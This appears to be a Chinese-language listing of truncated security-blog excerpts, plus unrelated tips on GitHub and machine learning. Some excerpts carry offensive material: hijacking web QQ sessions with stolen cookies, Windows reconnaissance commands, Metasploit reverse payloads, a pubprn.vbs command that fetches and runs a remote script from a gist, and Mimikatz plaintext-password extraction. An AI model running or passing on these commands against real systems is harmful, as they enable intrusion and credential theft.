2018年最佳黑客书籍 黑客资源看似遍布整个网络，但却很稀缺，所以阅读书籍通常很有帮助。实际上，在我看来，这是初学者学入侵最好的方法，因为所有的知识点都会汇集在一起。此列表中的所有书籍...

本文适合有较大量空闲时间，想好好研究js加密网站的人阅读 读完本文的作用：获取到用户cookie可以实现网页qq的所有功能，包括各种自动签到，有关于空间的各种工具，获取用户所有群和好友，自动...

1、在 GitHub 上编辑代码 我要先说一个很多人都知道的事儿。 当你使用 GitHub看一些文件时（任何的文本文件或者仓库），能看到一个顶部右侧有一个小铅笔图标。点击即可编辑文档。完成后，按照提...

简介 最近在逛码云时候发现permeat靶场系统,感觉界面和业务场景设计的还不错.所以过来分享一下. 同时也是分享一下我平时挖掘漏洞的一些思路吧,这篇文章里虽然只简单介绍其中三种漏洞类型，但也...

怎么入门机器/深度学习？ 回答这个问题，最先要考虑的问题是：你有多少时间？ 准备用三个月入门，和想要一个月速成，肯定是截然不同的路径。当然我建议大家稳扎稳打，至少可以拿出五个月的时间...

使用wmic识别安装到系统中的补丁情况 1 C:> wmic qfe get description,installedOn 识别正在运行的服务 1 2 C:>sc query type= service C:>net start 识别开机启动的程序，包括路径 1 ...

之前碰到的问题，自己的主机做了DMZ，设置[b]web_delivery[/b]时，发现将lhost设置成外网ip，则脚本不能运行，如果设置成内网ip，则反弹payload反弹的地址为内网地址，即不可能获取到会话，查看...

远程执行sct的另一种姿势 cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e...

最近做测试的时候发现，windows server2012 使用Mimikatz是直接抓不到明文密码的，而且，直接创建的账号登陆有时会碰到这个问题： ps：2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\S...

一、前期阶段 1、了解什么是黑客，每种技能都有其精神所在，没有信仰是绝对不行的。 2、黑客必备的一些基础命令，包括DOS命令，以及UNIX / Linux下的命令。 3、远程扫描、远程刺探技术。包括通...

写在前面的话 在此之前，很多朋友都曾通过电子邮件在我直播的时候问过我有关漏洞挖掘方面的问题，而且很多时候不同的人问的都是相同的问题。因此，我决定写一篇文章来回答一下朋友们问得最多的...